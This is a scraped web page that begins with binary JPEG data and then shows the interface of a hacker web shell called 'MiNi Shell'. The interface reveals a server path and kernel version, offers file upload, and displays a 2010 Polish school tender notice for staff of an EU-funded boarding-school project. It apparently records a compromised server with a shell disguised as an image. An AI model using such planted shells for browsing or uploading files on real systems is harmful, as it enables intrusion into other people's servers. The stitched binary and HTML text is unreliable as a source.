JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100507/111949-N-2010.html

<p class="kh_header"><b>Swarożyn: Wyłonienie osób zaangażowanych w realizację projektu: Internat XXI wieku</b><br>
<b>Numer ogłoszenia: 111949 - 2010; data zamieszczenia: 07.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Agrotechnicznych i Ogólnokształcących im. Stanisława Staszica , ul. Szkolna 2, 83-115 Swarożyn, woj. pomorskie, tel. 058 5369393, faks 058 5369393.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.powiat.tczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyłonienie osób zaangażowanych w realizację projektu: Internat XXI wieku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1. Przedmiotem zamówienia jest wyłonienie osób zaangażowanych w realizację projektu: Internat XXI wieku tj:

2.1.1 Kadra zarządzająca projektem, w skład której wchodzi:
a) koordynator projektu;
b) ekspert ds. promocji;
c) asystent ds. finansowych.

2.1.2 Kadra pedagogiczna, w skład której wchodzi:
a) trener zajęć ITC w wirtualnym świecie;
b) trener zajęć zastępowania agresji ART - Świat bez agresji, przemocy, uzależnień;
c) mistrz matematyki - zajęcia wyrównawcze. 

2.2 Głównym celem projektu: Internat XXI wieku jest podnoszenie kompetencji społecznych, informacyjnych, matematycznych i kulturalnych poprzez organizowanie alternatywnych form spędzania czasu wolnego dla 45 uczniów (15 dziewcząt i 30 chłopców) uczęszczających do ZSAiO w Swarożynie, pochodzących z terenów wiejskich pow. tczewskiego i starogardzkiego. 
	
2.3  Zamawiający dopuszcza możliwość składania ofert częściowych w 6 częściach, tj.:
Część 1 - Koordynator w ramach projektu Internat XXI wieku;
Część 2 - Ekspert ds. promocji w ramach projektu Internat XXI wieku;
Część 3 - Asystent ds. finansowych w ramach projektu Internat XXI wieku;
Część 4 - Trener zajęć ITC w wirtualnym świecie w ramach projektu Internat XXI wieku;
Część 5 - Trener zajęć zastępowania agresji ART - Świat bez agresji, przemocy, uzależnień w ramach projektu Internat XXI wieku;
Część 6 - Mistrz matematyki - zajęcia wyrównawcze w ramach projektu Internat XXI wieku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.39.00.00-3, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w tym postępowanie nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.3	Zamawiający oceni czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że dysponuje w poszczególnych częściach osobą, która:  
W zakresie części 1: Posiada wykształcenie wyższe - pedagogika opiekuńczo - wychowawcza, kwalifikacje w zakresie zarządzania projektami unijnymi, doświadczenie zawodowe w zakresie zarządzania i kierowania placówką opiekuńczo-wychowawczą minimum 5 lat. 

W zakresie części 2: Posiada wykształcenie wyższe - pedagogika opiekuńczo-wychowawcza, doświadczenie zawodowe tj. staż pracy w placówce opiekuńczo - wychowawczej minimum 5 lat, doświadczenie jako kierownik obozów stacjonarnych, umiejętność obsługi komputera - technologia informacyjna i edukacja multimedialna w praktyce szkolnej, administracji stroną internetową, obsługi skanera, aparatu cyfrowego, kamery cyfrowej, obsługa FrontPage, Word, Excel, Power Point, Corel Photo-Paint.

W zakresie części 3: Posiada wykształcenie ekonomiczne, umiejętność rozliczania projektów unijnych, doświadczenie zawodowe tj. minimum 5 letni staż pracy na stanowisku głównej księgowej. 

W zakresie części 4: Posiada wykształcenie wyższe z zakresu informatyki i przygotowanie pedagogiczne oraz stopień nauczyciela dyplomowanego, doświadczenie w administrowaniu sieciami komputerowymi i zarządzaniu informacją. 

W zakresie części 5: Posiada wykształcenie wyższe - pedagogika opiekuńczo-wychowawcza oraz stopień nauczyciela dyplomowanego, uprawnienia trenera ART. 

W zakresie części 6: Posiada wykształcenie wyższe z zakresu matematyki i przygotowanie pedagogiczne oraz stopień nauczyciela dyplomowanego, uprawnienia egzaminatora z zakresu matematyki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5.1.2	W zakresie części 1 - oświadczenie Wykonawcy potwierdzające, że dysponuje osobą posiadającą: wykształcenie wyższe - pedagogika opiekuńczo - wychowawcza, kwalifikacje w zakresie zarządzania projektami unijnymi, doświadczenie zawodowe w zakresie zarządzania i kierowania placówką opiekuńczo - wychowawczą minimum 5 lat (załącznik nr 1C).
5.1.3	W zakresie części 2 - oświadczenie Wykonawcy potwierdzające, że dysponuje osobą posiadającą: wykształcenie wyższe - pedagogika opiekuńczo - wychowawcza, doświadczenie zawodowe tj. staż pracy w placówce opiekuńczo - wychowawczej minimum 5 lat, doświadczenie jako kierownik obozów stacjonarnych, umiejętność obsługi komputera - technologia informacyjna i edukacja multimedialna w praktyce szkolnej, administracji stroną internetową, obsługi skanera, aparatu cyfrowego, kamery cyfrowej, obsługa FrontPage, Word, Excel, Power Point, Corel Photo-Paint (załącznik nr 1D).
5.1.4	W zakresie części 3 - oświadczenie Wykonawcy potwierdzające, że dysponuje osobą posiadającą: wykształcenie ekonomiczne, umiejętność rozliczania projektów unijnych, doświadczenie zawodowe tj. minimum 5 letni staż pracy na stanowisku głównej księgowej (załącznik nr 1E).
5.1.5	W zakresie części 4 - oświadczenie Wykonawcy potwierdzające, że dysponuje osobą posiadającą: wykształcenie wyższe z zakresu informatyki i przygotowanie pedagogiczne oraz stopień nauczyciela dyplomowanego, doświadczenie w administrowaniu sieciami komputerowymi i zarządzaniu informacją (załącznik nr 1F).
5.1.6	W zakresie części 5 - oświadczenie Wykonawcy potwierdzające, że dysponuje osobą posiadającą: wykształcenie wyższe - pedagogika opiekuńczo-wychowawcza oraz stopień nauczyciela dyplomowanego, uprawnienia trenera ART (załącznik nr 1G).
5.1.7	W zakresie części 6 - oświadczenie Wykonawcy potwierdzające, że dysponuje osobą posiadającą: wykształcenie wyższe z zakresu matematyki i przygotowanie pedagogiczne oraz stopień nauczyciela dyplomowanego, uprawnienia egzaminatora z zakresu matematyki (załącznik nr 1H).
5.1.8	Pisemne zobowiązania innych podmiotów do udostępnienia zasobów niezbędnych do realizacji zamówienia, jeżeli Wykonawca, wskazując spełnianie warunków, o których mowa w art. 22 ust. 1 Ustawy, polegał będzie na zasobach tych podmiotów na zasadach określonych w art. 26 ust. 2b Ustawy- w zakresie części od 1 do 6.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.powiat.tczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Zespołu Szkół Agrotechnicznych i Ogólnokształcących w Swarożynie woj. pomorskie kod 83-115, ulica Szkolna 2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 15:30, miejsce: Sekretariat Zespołu Szkół Agrotechnicznych i Ogólnokształcących w Swarożynie woj. pomorskie kod 83-115, ulica Szkolna 2..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Internat XXI wieku współfinansowy jest przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koordynator w ramach projektu Internat XXI wieku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.4 Świadczenie usług przez Koordynatora dotyczyć będzie Zespołu Szkół Agrotechnicznych i Ogólnokształcących w Swarożynie w ramach projektu Internat XXI wieku. 

2.4.1 Świadczenie usług, o których mowa wyżej zostanie zrealizowane w zakresie niżej wymienionych zadań:
- koordynacja merytoryczna: zarządzanie zadaniami i etapami projektu, planowanie i szeregowanie działań, harmonogramowanie i kontrolowanie czasu, monitorowanie wskaźników i rezultatów;
- koordynacja finansowa: planowanie wydatków, nadzór nad prowadzeniem księgowości projektu oraz sprawozdawczością;
- koordynacja administracyjna: zarządzanie środkami materialnymi, przestrzenią, zarządzanie informacją, bazami danych, ochrona danych oraz zarządzanie zasobami ludzkimi;
- koordynacja strategiczna: zarządzanie ryzykiem, zmianami, jakością oraz monitoring;
- rekrutacja grupy docelowej;
- ewaluacja mid-tem i ex-post;
- archiwizacja dokumentacji projektowej;
- organizacja podwieczorków podczas zajęć: ART, ITC i wyrównawczych z matematyki.

2.4.2	Założenia organizacyjne:  

- Miejsce pracy: Swarożyn, Gdańsk, Gdynia, Sopot, Mikoszewo
- Czas pracy: minimum 6 godzin dziennie (rano i popołudniu do 22.00) 
- Dyspozycyjność: 7 dni w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.00.00-3, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ekspert ds. promocji w ramach projektu Internat XXI wieku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.5  Świadczenie usług przez eksperta ds. promocji dotyczyć będzie Zespołu Szkół Agrotechnicznych i Ogólnokształcących w Swarożynie w ramach projektu Internat XXI wieku. 

2.5.1 	Świadczenie usług, o których mowa wyżej zostanie zrealizowane w zakresie niżej wymienionych zadań:
Promocja projektu w środowisku lokalnym:
- prezentacja realizacji projektu na stronie internetowej szkoły;
- zamieszczenie publikacji w prasie lokalnej;
- zorganizowanie konferencji inauguracyjnej i podsumowującej dla organów prowadzących i nadzorujących szkołę;
- zorganizowanie spotkania na rozpoczęcie i zakończenie projektu dla uczestników projektu i ich rodzin;
- pełnienie funkcji kierownika 12 wycieczek humanistycznych;
- opracowanie programu i harmonogramu wycieczek;
- organizowanie transportu i wyżywienia;
- zakup biletów wstępu do centrów kultury;
- monitorowanie rezultatów miękkich w formie ankiet i wywiadów.

2.5.2	Założenia organizacyjne: 

- Miejsce pracy: Swarożyn, Gdańsk, Gdynia, Sopot, Mikoszewo
- Czas pracy: minimum 6 godzin dziennie (rano i popołudniu do 22.00) 
- Dyspozycyjność: 7 dni w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.00.00-3, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Asystent ds. finansowych w ramach projektu Internat XXI wieku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.6  Świadczenie usług przez asystenta ds. finansowych dotyczyć będzie Zespołu Szkół Agrotechnicznych i Ogólnokształcących w Swarożynie w ramach projektu Internat XXI wieku. 

2.6.1 	Świadczenie usług, o których mowa wyżej zostanie zrealizowane w zakresie niżej wymienionych zadań:
- obsługa finansowo-księgowa projektu: ewidencjonowanie zdarzeń gospodarczych i sprawozdań finansowych.

2.6.2	Założenia organizacyjne: 

- Miejsce pracy: Swarożyn
- Czas pracy: minimum 6 godzin dziennie (rano i popołudniu do 22.00) 
- Dyspozycyjność: 7 dni w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.00.00-3, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Trener zajęć ITC w wirtualnym świecie w ramach projektu Internat XXI wieku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.7   Świadczenie usług przez Trenera zajęć ITC w wirtualnym świecie dotyczyć będzie Zespołu Szkół Agrotechnicznych i Ogólnokształcących w Swarożynie w ramach projektu Internat XXI wieku. 

2.7.1 	Świadczenie usług, o których mowa wyżej zostanie zrealizowane w niżej wymienionym zakresie pracy z młodzieżą:
- Komputer - historia i pierwsze kroki;
- Program - jak zainstalować;
- Klawiatura, pomoc i formatowanie nośnika;
- Edytor tekstu wbudowany w system;
- Pulpit-praca z ikonami;
- Praca z oknem;
- Podstawy zarządzania plikami;
- Pliki;
- Przenoszenie i kopiowanie plików i katalogów;
- Usuwanie i odzyskiwanie plików;
- Narzędzia wyszukiwawcze;
- Kompresja plików;
- Wirus komputerowy;
- Edytor tekstu - otwieranie dokumentów;
- Edytor tekstu - zapisywanie dokumentów;
- Pomoc, wyświetlanie dokumentu, paski narzędzi;
- Modyfikacja ustawień programu;
- Wpisywanie danych znaki specjalne;
- Zaznaczanie i edycja danych;
- Kopiowanie, wyszukiwanie, formatowanie;
- Indeksy, czcionka formatowanie;
- Formatowanie akapitu- znaczniki i wyrównywanie tekstu;
- Wcięcia i odstępy wewnątrz, przed i po akapicie;
- Tabulatory, punktowanie i numerowanie;
- Obramowanie akapitu i właściwości strony;
- Marginesy, Nagłówek-stopka, numeracja;
- Uruchamianie, tworzenie i zapisywanie nowego skoroszytu;
- Zmiana widoku arkusza;
- Blokowanie tytułów i opcje programu;
- Wprowadzanie danych;
- Zaznaczanie komórek;
- Ochrona fragmentów dokumentów przed zmianami i dostępem;
- Posługiwania się obiektami specjalnymi;
- Łączenie różnych obiektów pakietu Office;
- Budowa i wykorzystanie funkcji, JEŻELI z zagnieżdżeniem i bez;
- Zaawansowana modyfikacja wykresów;
- Sortowane i filtrowanie tabel;
- Tworzenie tabel przestawnych;
- Lokalne sieci komputerowe;
- Przetwarzanie plików graficznych i multimedialnych;
- Tworzenie materiałów prezentacyjnych;
- Statyczne serwisy WWW;
- Bazy danych;
- Podstawy zarządzania informacją;
- Elementy obsługi i zabezpieczeń baz danych.

2.7.2	Założenia organizacyjne:
- Miejsce pracy: Swarożyn;
- Łączna ilość godzin: 333 h..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.00.00-3, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Trener zajęć zastępowania agresji ART - Świat bez agresji, przemocy, uzależnień w ramach projektu Internat XXI wieku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.8   Świadczenie usług przez trenera zajęć zastępowania agresji ART - Świat bez agresji, przemocy, uzależnień dotyczyć będzie Zespołu Szkół Agrotechnicznych i Ogólnokształcących w Swarożynie w ramach projektu Internat XXI wieku. 

2.8.1	Świadczenie usług, o których mowa wyżej zostanie zrealizowane w niżej wymienionym zakresie pracy z młodzieżą:
- trening umiejętności prospołecznych;
- trening kontroli złości;
- trening wnioskowania moralnego;
- zagrożenie uzależnieniami: nikotyna, alkohol, narkotyki.

2.8.2	Założenia organizacyjne:
- Miejsce pracy: Swarożyn;
- Łączna ilość godzin: 333 h..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.00.00-3, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mistrz matematyki - zajęcia wyrównawcze w ramach projektu Internat XXI wieku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.9  Świadczenie usług przez Mistrza matematyki w ramach zajęć wyrównawczych dotyczyć będzie Zespołu Szkół Agrotechnicznych i Ogólnokształcących w Swarożynie w ramach projektu Internat XXI wieku.
 
2.9.1 Świadczenie usług, o których mowa wyżej zostanie zrealizowane w niżej wymienionym zakresie pracy z młodzieżą:
- przygotowanie do matury;
- funkcje: liniowa, kwadratowa, wykładnicza, wymierna;
- równania: liniowe, kwadratowe, wielomianowe, wymierne;
- nierówności: liniowe, kwadratowe;
- planimetria: pola, obroty wielokątów, okrąg, kwadrat;
- stereometria: pola powierzchni graniastosłupów, ostrosłupów, brył obrotowych;
- stosowanie trygonometrii do zadań z geometrii;
- statystyka i rachunek prawdopodobieństwa;
- rozwiązywanie zestawów maturalnych;
- geometria na płaszczyźnie
- działania na liczbach rzeczywistych różnej postaci, funkcja liniowa.

2.9.2	Założenia organizacyjne: 
- Miejsce pracy: Swarożyn;
- Łączna ilość godzin: 111 h..</p></li>
